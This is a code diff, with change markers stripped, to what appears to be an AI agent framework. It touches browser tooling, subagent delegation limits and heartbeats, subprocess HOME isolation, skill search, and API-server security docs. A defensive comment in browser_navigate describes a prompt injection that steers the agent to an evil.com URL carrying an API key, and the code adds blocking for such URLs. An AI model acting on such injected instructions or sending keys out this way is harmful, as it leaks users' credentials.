This function discovers those paths so they can be added to subprocess PATH.
/opt/homebrew/bin, agent-browser isn't discoverable on the default PATH.
This function finds those directories so they can be prepended.
"""
dirs: list[str] = []
homebrew_opt = "/opt/homebrew/opt"
if not os.path.isdir(homebrew_opt):
return dirs
return tuple(dirs)
try:
for entry in os.listdir(homebrew_opt):
if entry.startswith("node") and entry != "node":
# e.g. node@20, node@24
bin_dir = os.path.join(homebrew_opt, entry, "bin")
if os.path.isdir(bin_dir):
dirs.append(bin_dir)
except OSError:
pass
return dirs
return tuple(dirs)
# Throttle screenshot cleanup to avoid repeated full directory scans.
_last_screenshot_cleanup_by_dir: dict[str, float] = {}
@@ -132,28 +133,39 @@ _last_screenshot_cleanup_by_dir: dict[str, float] = {}
# Default timeout for browser commands (seconds)
DEFAULT_COMMAND_TIMEOUT = 30
# Default session timeout (seconds)
DEFAULT_SESSION_TIMEOUT = 300
# Max tokens for snapshot content before summarization
SNAPSHOT_SUMMARIZE_THRESHOLD = 8000
# Commands that legitimately return empty stdout (e.g. close, record).
_EMPTY_OK_COMMANDS: frozenset = frozenset({"close", "record"})
_cached_command_timeout: Optional[int] = None
_command_timeout_resolved = False
def _get_command_timeout() -> int:
"""Return the configured browser command timeout from config.yaml.
Reads ``config["browser"]["command_timeout"]`` and falls back to
``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable.
``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable. Result is
cached after the first call and cleared by ``cleanup_all_browsers()``.
"""
global _cached_command_timeout, _command_timeout_resolved
if _command_timeout_resolved:
return _cached_command_timeout # type: ignore[return-value]
_command_timeout_resolved = True
result = DEFAULT_COMMAND_TIMEOUT
try:
from hermes_cli.config import read_raw_config
cfg = read_raw_config()
val = cfg.get("browser", {}).get("command_timeout")
if val is not None:
return max(int(val), 5) # Floor at 5s to avoid instant kills
result = max(int(val), 5) # Floor at 5s to avoid instant kills
except Exception as e:
logger.debug("Could not read command_timeout from config: %s", e)
return DEFAULT_COMMAND_TIMEOUT
_cached_command_timeout = result
return result
def _get_vision_model() -> Optional[str]:
@@ -239,6 +251,8 @@ _cached_cloud_provider: Optional[CloudBrowserProvider] = None
_cloud_provider_resolved = False
_allow_private_urls_resolved = False
_cached_allow_private_urls: Optional[bool] = None
_cached_agent_browser: Optional[str] = None
_agent_browser_resolved = False
def _get_cloud_provider() -> Optional[CloudBrowserProvider]:
@@ -415,7 +429,7 @@ def _emergency_cleanup_all_sessions():
with _cleanup_lock:
_active_sessions.clear()
_session_last_activity.clear()
_recording_sessions.clear()
_recording_sessions.clear()
# Register cleanup via atexit only. Previous versions installed SIGINT/SIGTERM
@@ -617,15 +631,6 @@ BROWSER_TOOL_SCHEMAS = [
"required": ["key"]
}
},
{
"name": "browser_close",
"description": "Close the browser session and release resources. Call this when done with browser tasks to free up cloud browser session quota.",
"parameters": {
"type": "object",
"properties": {},
"required": []
}
},
{
"name": "browser_get_images",
"description": "Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first.",
@@ -777,10 +782,26 @@ def _find_agent_browser() -> str:
Raises:
FileNotFoundError: If agent-browser is not installed
"""
global _cached_agent_browser, _agent_browser_resolved
if _agent_browser_resolved:
if _cached_agent_browser is None:
raise FileNotFoundError(
"agent-browser CLI not found (cached). Install it with: "
f"{_browser_install_hint()}\n"
"Or run 'npm install' in the repo root to install locally.\n"
"Or ensure npx is available in your PATH."
)
return _cached_agent_browser
# Note: _agent_browser_resolved is set at each return site below
# (not before the search) to prevent a race where a concurrent thread
# sees resolved=True but _cached_agent_browser is still None.
# Check if it's in PATH (global install)
which_result = shutil.which("agent-browser")
if which_result:
_cached_agent_browser = which_result
_agent_browser_resolved = True
return which_result
# Build an extended search PATH including Homebrew and Hermes-managed dirs.
@@ -800,21 +821,29 @@ def _find_agent_browser() -> str:
extended_path = os.pathsep.join(extra_dirs)
which_result = shutil.which("agent-browser", path=extended_path)
if which_result:
_cached_agent_browser = which_result
_agent_browser_resolved = True
return which_result
# Check local node_modules/.bin/ (npm install in repo root)
repo_root = Path(__file__).parent.parent
local_bin = repo_root / "node_modules" / ".bin" / "agent-browser"
if local_bin.exists():
return str(local_bin)
_cached_agent_browser = str(local_bin)
_agent_browser_resolved = True
return _cached_agent_browser
# Check common npx locations (also search extended dirs)
npx_path = shutil.which("npx")
if not npx_path and extra_dirs:
npx_path = shutil.which("npx", path=os.pathsep.join(extra_dirs))
if npx_path:
return "npx agent-browser"
_cached_agent_browser = "npx agent-browser"
_agent_browser_resolved = True
return _cached_agent_browser
# Nothing found — cache the failure so subsequent calls don't re-scan.
_agent_browser_resolved = True
raise FileNotFoundError(
"agent-browser CLI not found. Install it with: "
f"{_browser_install_hint()}\n"
@@ -935,7 +964,7 @@ def _run_browser_command(
path_parts = [p for p in existing_path.split(":") if p]
candidate_dirs = (
[hermes_node_bin]
+ _discover_homebrew_node_dirs()
+ list(_discover_homebrew_node_dirs())
+ [p for p in _SANE_PATH.split(":") if p]
)
@@ -994,15 +1023,15 @@ def _run_browser_command(
level = logging.WARNING if returncode != 0 else logging.DEBUG
logger.log(level, "browser '%s' stderr: %s", command, stderr.strip()[:500])
# Log empty output as warning — common sign of broken agent-browser
if not stdout.strip() and returncode == 0:
logger.warning("browser '%s' returned empty stdout with rc=0. "
"cmd=%s stderr=%s",
command, " ".join(cmd_parts[:4]) + "...",
(stderr or "")[:200])
stdout_text = stdout.strip()
# Empty output with rc=0 is a broken state — treat as failure rather
# than silently returning {"success": True, "data": {}}.
# Some commands (close, record) legitimately return no output.
if not stdout_text and returncode == 0 and command not in _EMPTY_OK_COMMANDS:
logger.warning("browser '%s' returned empty output (rc=0)", command)
return {"success": False, "error": f"Browser command '{command}' returned no output"}
if stdout_text:
try:
parsed = json.loads(stdout_text)
@@ -1114,20 +1143,34 @@ def _extract_relevant_content(
def _truncate_snapshot(snapshot_text: str, max_chars: int = 8000) -> str:
"""
Simple truncation fallback for snapshots.
"""Structure-aware truncation for snapshots.
Cuts at line boundaries so that accessibility tree elements are never
split mid-line, and appends a note telling the agent how much was
omitted.
Args:
snapshot_text: The snapshot text to truncate
max_chars: Maximum characters to keep
Returns:
Truncated text with indicator if truncated
"""
if len(snapshot_text) <= max_chars:
return snapshot_text
return snapshot_text[:max_chars] + "\n\n[... content truncated ...]"
lines = snapshot_text.split('\n')
result: list[str] = []
chars = 0
for line in lines:
if chars + len(line) + 1 > max_chars - 80: # reserve space for note
break
result.append(line)
chars += len(line) + 1
remaining = len(lines) - len(result)
if remaining > 0:
result.append(f'\n[... {remaining} more lines truncated, use browser_snapshot for full content]')
return '\n'.join(result)
# ============================================================================
@@ -1148,8 +1191,11 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
# Secret exfiltration protection — block URLs that embed API keys or
# tokens in query parameters. A prompt injection could trick the agent
# into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
# Also check URL-decoded form to catch %2D encoding tricks (e.g. sk%2Dant%2D...).
import urllib.parse
from agent.redact import _PREFIX_RE
if _PREFIX_RE.search(url):
url_decoded = urllib.parse.unquote(url)
if _PREFIX_RE.search(url) or _PREFIX_RE.search(url_decoded):
return json.dumps({
"success": False,
"error": "Blocked: URL contains what appears to be an API key or token. "
@@ -1415,13 +1461,15 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
"error": f"Invalid direction '{direction}'. Use 'up' or 'down'."
}, ensure_ascii=False)
# Repeat the scroll 5 times to get meaningful page movement.
# Most backends scroll ~100px per call, which is barely visible.
# 5x gives roughly half a viewport of travel, backend-agnostic.
_SCROLL_REPEATS = 5
# Single scroll with pixel amount instead of 5x subprocess calls.
# agent-browser supports: agent-browser scroll down 500
# ~500px is roughly half a viewport of travel.
_SCROLL_PIXELS = 500
if _is_camofox_mode():
from tools.browser_camofox import camofox_scroll
# Camofox REST API doesn't support pixel args; use repeated calls
_SCROLL_REPEATS = 5
result = None
for _ in range(_SCROLL_REPEATS):
result = camofox_scroll(direction, task_id)
@@ -1429,14 +1477,12 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
effective_task_id = task_id or "default"
result = None
for _ in range(_SCROLL_REPEATS):
result = _run_browser_command(effective_task_id, "scroll", [direction])
if not result.get("success"):
return json.dumps({
"success": False,
"error": result.get("error", f"Failed to scroll {direction}")
}, ensure_ascii=False)
result = _run_browser_command(effective_task_id, "scroll", [direction, str(_SCROLL_PIXELS)])
if not result.get("success"):
return json.dumps({
"success": False,
"error": result.get("error", f"Failed to scroll {direction}")
}, ensure_ascii=False)
return json.dumps({
"success": True,
@@ -1607,11 +1653,11 @@ def _browser_eval(expression: str, task_id: Optional[str] = None) -> str:
def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
"""Evaluate JS via Camofox's /tabs/{tab_id}/eval endpoint (if available)."""
from tools.browser_camofox import _get_session, _ensure_tab, _post
from tools.browser_camofox import _ensure_tab, _post
try:
session = _get_session(task_id or "default")
tab_id = _ensure_tab(session)
resp = _post(f"/tabs/{tab_id}/eval", json_data={"expression": expression})
tab_info = _ensure_tab(task_id or "default")
tab_id = tab_info.get("tab_id") or tab_info.get("id")
resp = _post(f"/tabs/{tab_id}/eval", body={"expression": expression})
# Camofox returns the result in a JSON envelope
raw_result = resp.get("result") if isinstance(resp, dict) else resp
@@ -1641,8 +1687,9 @@ def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
def _maybe_start_recording(task_id: str):
"""Start recording if browser.record_sessions is enabled in config."""
if task_id in _recording_sessions:
return
with _cleanup_lock:
if task_id in _recording_sessions:
return
try:
from hermes_cli.config import read_raw_config
hermes_home = get_hermes_home()
@@ -1662,7 +1709,8 @@ def _maybe_start_recording(task_id: str):
result = _run_browser_command(task_id, "record", ["start", str(recording_path)])
if result.get("success"):
_recording_sessions.add(task_id)
with _cleanup_lock:
_recording_sessions.add(task_id)
logger.info("Auto-recording browser session %s to %s", task_id, recording_path)
else:
logger.debug("Could not start auto-recording: %s", result.get("error"))
@@ -1672,8 +1720,9 @@ def _maybe_start_recording(task_id: str):
def _maybe_stop_recording(task_id: str):
"""Stop recording if one is active for this session."""
if task_id not in _recording_sessions:
return
with _cleanup_lock:
if task_id not in _recording_sessions:
return
try:
result = _run_browser_command(task_id, "record", ["stop"])
if result.get("success"):
@@ -1682,7 +1731,8 @@ def _maybe_stop_recording(task_id: str):
except Exception as e:
logger.debug("Could not stop recording for %s: %s", task_id, e)
finally:
_recording_sessions.discard(task_id)
with _cleanup_lock:
_recording_sessions.discard(task_id)
def browser_get_images(task_id: Optional[str] = None) -> str:
@@ -2041,6 +2091,14 @@ def cleanup_all_browsers() -> None:
for task_id in task_ids:
cleanup_browser(task_id)
# Reset cached lookups so they are re-evaluated on next use.
global _cached_agent_browser, _agent_browser_resolved
global _cached_command_timeout, _command_timeout_resolved
_cached_agent_browser = None
_agent_browser_resolved = False
_discover_homebrew_node_dirs.cache_clear()
_cached_command_timeout = None
_command_timeout_resolved = False
# ============================================================================

View File

@@ -1020,6 +1020,13 @@ def execute_code(
if _tz_name:
child_env["TZ"] = _tz_name
# Per-profile HOME isolation: redirect system tool configs into
# {HERMES_HOME}/home/ when that directory exists.
from hermes_constants import get_subprocess_home
_profile_home = get_subprocess_home()
if _profile_home:
child_env["HOME"] = _profile_home
proc = subprocess.Popen(
[sys.executable, "script.py"],
cwd=tmpdir,

View File

@@ -20,6 +20,7 @@ import json
import logging
logger = logging.getLogger(__name__)
import os
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import Any, Dict, List, Optional
@@ -34,9 +35,36 @@ DELEGATE_BLOCKED_TOOLS = frozenset([
"execute_code", # children should reason step-by-step, not write scripts
])
MAX_CONCURRENT_CHILDREN = 3
_DEFAULT_MAX_CONCURRENT_CHILDREN = 3
MAX_DEPTH = 2 # parent (0) -> child (1) -> grandchild rejected (2)
def _get_max_concurrent_children() -> int:
"""Read delegation.max_concurrent_children from config, falling back to
DELEGATION_MAX_CONCURRENT_CHILDREN env var, then the default (3).
Uses the same ``_load_config()`` path that the rest of ``delegate_task``
uses, keeping config priority consistent (config.yaml > env > default).
"""
cfg = _load_config()
val = cfg.get("max_concurrent_children")
if val is not None:
try:
return max(1, int(val))
except (TypeError, ValueError):
logger.warning(
"delegation.max_concurrent_children=%r is not a valid integer; "
"using default %d", val, _DEFAULT_MAX_CONCURRENT_CHILDREN,
)
env_val = os.getenv("DELEGATION_MAX_CONCURRENT_CHILDREN")
if env_val:
try:
return max(1, int(env_val))
except (TypeError, ValueError):
pass
return _DEFAULT_MAX_CONCURRENT_CHILDREN
DEFAULT_MAX_ITERATIONS = 50
_HEARTBEAT_INTERVAL = 30 # seconds between parent activity heartbeats during delegation
DEFAULT_TOOLSETS = ["terminal", "file", "web"]
@@ -369,6 +397,44 @@ def _run_single_child(
except Exception as exc:
logger.debug("Failed to bind child to leased credential: %s", exc)
# Heartbeat: periodically propagate child activity to the parent so the
# gateway inactivity timeout doesn't fire while the subagent is working.
# Without this, the parent's _last_activity_ts freezes when delegate_task
# starts and the gateway eventually kills the agent for "no activity".
_heartbeat_stop = threading.Event()
def _heartbeat_loop():
while not _heartbeat_stop.wait(_HEARTBEAT_INTERVAL):
if parent_agent is None:
continue
touch = getattr(parent_agent, '_touch_activity', None)
if not touch:
continue
# Pull detail from the child's own activity tracker
desc = f"delegate_task: subagent {task_index} working"
try:
child_summary = child.get_activity_summary()
child_tool = child_summary.get("current_tool")
child_iter = child_summary.get("api_call_count", 0)
child_max = child_summary.get("max_iterations", 0)
if child_tool:
desc = (f"delegate_task: subagent running {child_tool} "
f"(iteration {child_iter}/{child_max})")
else:
child_desc = child_summary.get("last_activity_desc", "")
if child_desc:
desc = (f"delegate_task: subagent {child_desc} "
f"(iteration {child_iter}/{child_max})")
except Exception:
pass
try:
touch(desc)
except Exception:
pass
_heartbeat_thread = threading.Thread(target=_heartbeat_loop, daemon=True)
_heartbeat_thread.start()
try:
result = child.run_conversation(user_message=goal)
@@ -479,6 +545,11 @@ def _run_single_child(
}
finally:
# Stop the heartbeat thread so it doesn't keep touching parent activity
# after the child has finished (or failed).
_heartbeat_stop.set()
_heartbeat_thread.join(timeout=5)
if child_pool is not None and leased_cred_id is not None:
try:
child_pool.release_lease(leased_cred_id)
@@ -507,15 +578,6 @@ def _run_single_child(
except (ValueError, UnboundLocalError) as e:
logger.debug("Could not remove child from active_children: %s", e)
# Close tool resources (terminal sandboxes, browser daemons,
# background processes, httpx clients) so subagent subprocesses
# don't outlive the delegation.
try:
if hasattr(child, 'close'):
child.close()
except Exception:
logger.debug("Failed to close child agent after delegation")
def delegate_task(
goal: Optional[str] = None,
context: Optional[str] = None,
@@ -564,8 +626,17 @@ def delegate_task(
return tool_error(str(exc))
# Normalize to task list
max_children = _get_max_concurrent_children()
if tasks and isinstance(tasks, list):
task_list = tasks[:MAX_CONCURRENT_CHILDREN]
if len(tasks) > max_children:
return tool_error(
f"Too many tasks: {len(tasks)} provided, but "
f"max_concurrent_children is {max_children}. "
f"Either reduce the task count, split into multiple "
f"delegate_task calls, or increase "
f"delegation.max_concurrent_children in config.yaml."
)
task_list = tasks
elif goal and isinstance(goal, str) and goal.strip():
task_list = [{"goal": goal, "context": context, "toolsets": toolsets}]
else:
@@ -625,7 +696,7 @@ def delegate_task(
completed_count = 0
spinner_ref = getattr(parent_agent, '_delegate_spinner', None)
with ThreadPoolExecutor(max_workers=MAX_CONCURRENT_CHILDREN) as executor:
with ThreadPoolExecutor(max_workers=max_children) as executor:
futures = {}
for i, t, child in children:
future = executor.submit(
@@ -929,9 +1000,11 @@ DELEGATE_TASK_SCHEMA = {
},
"required": ["goal"],
},
"maxItems": 3,
# No maxItems — the runtime limit is configurable via
# delegation.max_concurrent_children (default 3) and
# enforced with a clear error in delegate_task().
"description": (
"Batch mode: up to 3 tasks to run in parallel. Each gets "
"Batch mode: tasks to run in parallel (limit configurable via delegation.max_concurrent_children, default 3). Each gets "
"its own subagent with isolated context and terminal session. "
"When provided, top-level goal/context/toolsets are ignored."
),

View File

@@ -129,6 +129,12 @@ def _sanitize_subprocess_env(base_env: dict | None, extra_env: dict | None = Non
elif key not in _HERMES_PROVIDER_ENV_BLOCKLIST or _is_passthrough(key):
sanitized[key] = value
# Per-profile HOME isolation for background processes (same as _make_run_env).
from hermes_constants import get_subprocess_home
_profile_home = get_subprocess_home()
if _profile_home:
sanitized["HOME"] = _profile_home
return sanitized
@@ -195,6 +201,15 @@ def _make_run_env(env: dict) -> dict:
existing_path = run_env.get("PATH", "")
if "/usr/bin" not in existing_path.split(":"):
run_env["PATH"] = f"{existing_path}:{_SANE_PATH}" if existing_path else _SANE_PATH
# Per-profile HOME isolation: redirect system tool configs (git, ssh, gh,
# npm …) into {HERMES_HOME}/home/ when that directory exists. Only the
# subprocess sees the override — the Python process keeps the real HOME.
from hermes_constants import get_subprocess_home
_profile_home = get_subprocess_home()
if _profile_home:
run_env["HOME"] = _profile_home
return run_env

View File

@@ -2675,19 +2675,89 @@ def create_source_router(auth: Optional[GitHubAuth] = None) -> List[SkillSource]
return sources
def _search_one_source(
src: SkillSource, query: str, limit: int
) -> Tuple[str, List[SkillMeta]]:
"""Search a single source. Runs in a thread for parallelism."""
try:
return src.source_id(), src.search(query, limit=limit)
except Exception as e:
logger.debug("Search failed for %s: %s", src.source_id(), e)
return src.source_id(), []
def parallel_search_sources(
sources: List[SkillSource],
query: str = "",
per_source_limits: Optional[Dict[str, int]] = None,
source_filter: str = "all",
overall_timeout: float = 30,
on_source_done: Optional[Any] = None,
) -> Tuple[List[SkillMeta], Dict[str, int], List[str]]:
"""Search all sources in parallel with per-source timeout.
Returns ``(all_results, source_counts, timed_out_ids)``.
*on_source_done* is an optional callback ``(source_id, count) -> None``
invoked as each source completes — useful for progress indicators.
"""
from concurrent.futures import ThreadPoolExecutor, as_completed
per_source_limits = per_source_limits or {}
active: List[SkillSource] = []
for src in sources:
sid = src.source_id()
if source_filter != "all" and sid != source_filter and sid != "official":
continue
active.append(src)
all_results: List[SkillMeta] = []
source_counts: Dict[str, int] = {}
timed_out_ids: List[str] = []
if not active:
return all_results, source_counts, timed_out_ids
with ThreadPoolExecutor(max_workers=min(len(active), 8)) as pool:
futures = {}
for src in active:
lim = per_source_limits.get(src.source_id(), 50)
fut = pool.submit(_search_one_source, src, query, lim)
futures[fut] = src.source_id()
try:
for fut in as_completed(futures, timeout=overall_timeout):
try:
sid, results = fut.result(timeout=0)
source_counts[sid] = len(results)
all_results.extend(results)
if on_source_done:
on_source_done(sid, len(results))
except Exception:
pass
except TimeoutError:
timed_out_ids = [
futures[f] for f in futures if not f.done()
]
if timed_out_ids:
logger.debug(
"Skills browse timed out waiting for: %s",
", ".join(timed_out_ids),
)
return all_results, source_counts, timed_out_ids
def unified_search(query: str, sources: List[SkillSource],
source_filter: str = "all", limit: int = 10) -> List[SkillMeta]:
"""Search all sources and merge results."""
all_results: List[SkillMeta] = []
for src in sources:
if source_filter != "all" and src.source_id() != source_filter:
continue
try:
results = src.search(query, limit=limit)
all_results.extend(results)
except Exception as e:
logger.debug(f"Search failed for {src.source_id()}: {e}")
"""Search all sources (in parallel) and merge results."""
all_results, _, _ = parallel_search_sources(
sources,
query=query,
source_filter=source_filter,
overall_timeout=30,
)
# Deduplicate by name, preferring higher trust levels
_TRUST_RANK = {"builtin": 2, "trusted": 1, "community": 0}

View File

@@ -268,10 +268,10 @@ For cloud sandbox backends, persistence is filesystem-oriented. `TERMINAL_LIFETI
| `WEBHOOK_PORT` | HTTP server port for receiving webhooks (default: `8644`) |
| `WEBHOOK_SECRET` | Global HMAC secret for webhook signature validation (used as fallback when routes don't specify their own) |
| `API_SERVER_ENABLED` | Enable the OpenAI-compatible API server (`true`/`false`). Runs alongside other platforms. |
| `API_SERVER_KEY` | Bearer token for API server authentication. Strongly recommended; required for any network-accessible deployment. |
| `API_SERVER_KEY` | Bearer token for API server authentication. Enforced for non-loopback binding. |
| `API_SERVER_CORS_ORIGINS` | Comma-separated browser origins allowed to call the API server directly (for example `http://localhost:3000,http://127.0.0.1:3000`). Default: disabled. |
| `API_SERVER_PORT` | Port for the API server (default: `8642`) |
| `API_SERVER_HOST` | Host/bind address for the API server (default: `127.0.0.1`). Use `0.0.0.0` for network access only with `API_SERVER_KEY` and a narrow `API_SERVER_CORS_ORIGINS` allowlist. |
| `API_SERVER_HOST` | Host/bind address for the API server (default: `127.0.0.1`). Use `0.0.0.0` for network access — requires `API_SERVER_KEY` and a narrow `API_SERVER_CORS_ORIGINS` allowlist. |
| `API_SERVER_MODEL_NAME` | Model name advertised on `/v1/models`. Defaults to the profile name (or `hermes-agent` for the default profile). Useful for multi-user setups where frontends like Open WebUI need distinct model names per connection. |
| `MESSAGING_CWD` | Working directory for terminal commands in messaging mode (default: `~`) |
| `GATEWAY_ALLOWED_USERS` | Comma-separated user IDs allowed across all platforms |

View File

@@ -177,7 +177,7 @@ Authorization: Bearer ***
Configure the key via `API_SERVER_KEY` env var. If you need a browser to call Hermes directly, also set `API_SERVER_CORS_ORIGINS` to an explicit allowlist.
:::warning Security
The API server gives full access to hermes-agent's toolset, **including terminal commands**. If you change the bind address to `0.0.0.0` (network-accessible), **always set `API_SERVER_KEY`** and keep `API_SERVER_CORS_ORIGINS` narrow — without that, remote callers may be able to execute arbitrary commands on your machine.
The API server gives full access to hermes-agent's toolset, **including terminal commands**. When binding to a non-loopback address like `0.0.0.0`, `API_SERVER_KEY` is **required**. Also keep `API_SERVER_CORS_ORIGINS` narrow to control browser access.
The default bind address (`127.0.0.1`) is for local-only use. Browser access is disabled by default; enable it only for explicit trusted origins.
:::